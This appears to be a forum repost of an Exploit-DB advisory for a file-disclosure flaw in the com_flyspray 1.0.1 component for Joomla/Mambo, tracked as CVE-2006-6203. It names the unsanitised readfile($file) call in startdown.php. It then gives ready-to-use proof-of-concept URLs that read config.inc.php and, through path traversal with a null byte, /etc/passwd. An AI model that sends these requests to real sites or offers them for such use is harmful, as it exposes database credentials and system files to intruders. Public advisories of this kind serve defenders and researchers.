- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2852
- Проверка EDB
-
- Пройдено
- Автор
- 3L3CTRIC-CRACKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6203
- Дата публикации
- 2006-11-26
Код:
_____ __ __ __ ___
| __ \ | \/ | \ \ / (_)
| | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __|
| |__| | | | | | | (_| |> < \ / | | | | |_| \__ \
|_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/
*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************
# milw0rm.com [2006-11-26]- Источник
- www.exploit-db.com
